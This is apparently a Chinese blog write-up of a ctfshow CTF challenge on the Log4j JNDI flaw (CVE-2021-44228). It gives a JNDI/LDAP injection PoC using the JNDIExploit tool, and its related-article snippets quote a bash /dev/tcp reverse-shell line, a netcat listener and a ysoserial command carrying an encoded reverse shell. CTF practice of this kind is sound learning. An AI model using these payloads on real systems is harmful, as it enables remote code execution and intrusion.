ctfshow—web—Log4j复现

于 2023-09-03 20:31:08 发布
阅读量465 收藏
点赞数
分类专栏: web CTF 文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HAI_WD/article/details/132655057
版权
CTF 同时被 2 个专栏收录
81 篇文章 1 订阅
订阅专栏
web
37 篇文章 0 订阅
订阅专栏

0x00 前言

0x01 题目

在这里插入图片描述

0x02 Write Up

这是一个log4j利用的环境,因为log4j本生就是一个jndi漏洞的利用,所以还是基本的jndi利用就可以了。

log4j的payload是:${jndi:ldap://}

这里选取的工具是:JNDIExploit

利用的话需要有一个vps,poc是:user=${jndi:ldap://0.0.0.0:1389/TomcatBypass/TomcatEcho}

这个poc可以进行回显显示:

在这里插入图片描述

获取到flag

在这里插入图片描述

0x03 other

欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源,技能树,面试题等。

以上

Wcbddd
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Log4j2漏洞复现
MoCoCN的博客
12-22 2931
0x00 前言 慢慢的距离上次写文章已过去了377天,这一年发生了好多好多的事,经历了好多好多的变故,或喜或悲、或分或合、起起落落,整整的一年了得,没怎么好好学习,没怎么认真的钻研技术,对自己表示很抱歉,违背了“白帽守则”,让我们重温一下“白帽守则”: 白帽守则第一页第一条,心中无女人,挖洞自然神。 白帽守则第一页第二条,只有不努力的白帽,没有挖不到的漏洞 对此我深表歉意、望大家以我为戒,踏踏实实的深入贯彻落实“白帽守则”,切实维护祖国网络空间安全。 0x01漏洞描述 Apache Log4j2是一款优秀的
Log4j2 RCE漏洞复现
守拙的博客
12-10 4520
最新log4j rce漏洞复现
ctfshow-Log4j复现-log4j复现
最新发布
wrypot的博客
08-21 718
另一个终端进入JNDIExploit-1.2-SNAPSHOT.jar所在的目录jndiexploit执行下面命令。1、买VPS,打开mobax进行ssh连接,开两个终端。
ctfshow log4j复现 wp|CVE-2021-44228
spring!
03-24 4631
ctfshow log4j复现 wp|CVE-2021-44228
Log4j复现
qq_56150805的博客
05-06 259
复现: 1.准备好vps服务器 2.安装ldap服务器 3.开启ldap服务器 4.监听nc -lvnp 1099 5.设置playload 6.cd / 回车 cat ctfshowflag 可见flag: ctfshow{cd64d28e-e9d9-4636-837a-7447c989aa5e}
ctfshow Log4j复现wp
weixin_52829570的博客
01-14 2957
声明: 该文章来自本人日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本人无关 JNDIExploit 先将反弹shell的命令base64编码,然后将里面的+号和=号进行一次url编码 注:IP填vps公网ip,PORT要和nc监听的端口对应 bash -i >& /dev/tcp/IP/PORT 0>&1 # => YmFzaCAtaSA+JiAvZGV2L3RjcC9JUC9QT1JUIDA+JjE= # => Ym
深入浅析java web log4j 配置及在web项目中配置Log4j的技巧
09-03
在Java Web项目中集成Log4j,可以帮助我们更好地管理和跟踪应用程序中的错误、警告和其他信息。下面将详细阐述如何在Web项目中配置Log4j。 首先,我们需要在`web.xml`文件中添加相关的配置参数。这些参数告诉应用...
logging-log4j2-log4j-2.15.0-rc2.zip maven 资源库
12-31
针对Log4j 2 远程代码执行漏洞,需要用到的升级资源包,适用于maven资源库,包括log4jlog4j-core,log4j-api,log4j-1.2-api,log4j-jpa等全套2.15.0 maven资源库jar包。如果是maven本地仓库使用,需要将zip包解压...
[Log4j]CVE-2021-44228 CTFshow
krysyal的博客
03-31 3594
Log4j复现 CTFshow 复现参考文档1 复现参考文档2 环境 http://dcc43afd-8e07-4d9e-8bd2-b0a1c320a5b7.challenge.ctf.show/ 2.0 <= Apache log4j2 <= 2.14.1 简单来说,用户输入会记录在log4j中,而log4j自带lookup功能,格式为${parser:xxx}。如果用户输入lookup会被log4j解析。 jndi是parser的一种,是一种标准的Java命名系统接口,可以连接远程服务,格式
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 8017
log4j漏洞原理和靶场复现
最详细的Log4j使用教程
Code_LT的博客
07-08 4352
其实您也可以完全不使用配置文件,而是在代码中配置Log4j环境。但是,使用配置文件将使您的应用程序更加灵活。Log4j支持两种配置文件格式,一种是XML格式的文件,一种是Java特性文件(键=值)。下面我们介绍使用Java特性文件做为配置文件的方法:其中,level 是日志记录的优先级,分为OFF、FATAL、ERROR、WARN、INFO、DEBUG、ALL或者您定义的级别。Log4j建议只使用四个级别,优 先级从高到低分别是ERROR、WARN、INFO、DEBUG。
Log4j2】VNCTF2022 misc-minecraft log4j反弹shell复现
qq_33834637的博客
04-25 4188
##POC hint mc的flag在/flag Misc mc :hint log4j jdk8u261 commons-collections-3.2.1.jar 使用ysoserial.jar生成反序列化数据 java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yMDkuMTQxLjMyLjc3LzIzMjIzIDA+JjE=}|{base6
sping-boot log4j2小实验
weixin_51566416的博客
12-14 971
最近刷屏的超级漏洞log4j2,复现难度不大,没接触java的同学花点时间上手下,buuctf和bugku两个ctf平台上都出了题,可以刷下。 条件:需要一台可公网访问的机器(比如云服务器)BUUCTF在线评测跳转提示 那么log4j是什么呢? Log4j是Apache的一个开源项目(但并不是),通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息
buuctf 刷题记录 模板注入
SopRomeo的博客
01-16 882
查看源代码发现三个txt进入的格式是这样的 把filename改为/fllllllllllllag emmmmm,点其他连个看看 有思路了重点就是求出这个cookie_secret 作为一个菜鸡,百度tornado 然后了解到了模板注入(配上网址https://www.jianshu.com/p/aef2ae0498df) render是一个类似模板的东西,可以使用不同的参数来访问网页...
BUUCTF-Real
weixin_43821278的博客
03-08 4941
BUUCTF-Real
ctf bugku Apache Log4j2 RCE解题
YouthBelief的博客
03-08 4428
0x00 环境准备 工具地址 https://github.com/welk1n/JNDI-Injection-Exploit 题目地址 https://ctf.bugku.com/challenges/detail/id/340.html dnslog地址 http://www.dnslog.cn/ 0x01 工具配置 $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git $ cd JNDI-
Log4j2安全漏洞复现及解决
"此资源主要关于在log4j2版本2.15及以下版本中复现一个bug的情况。" 在Log4j库的历史中,有一个非常重要的安全漏洞,该漏洞存在于Log4j 1.x以及Log4j 2.x的早期版本中。此文档似乎是在尝试复现Log4j2的一个特定版本...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值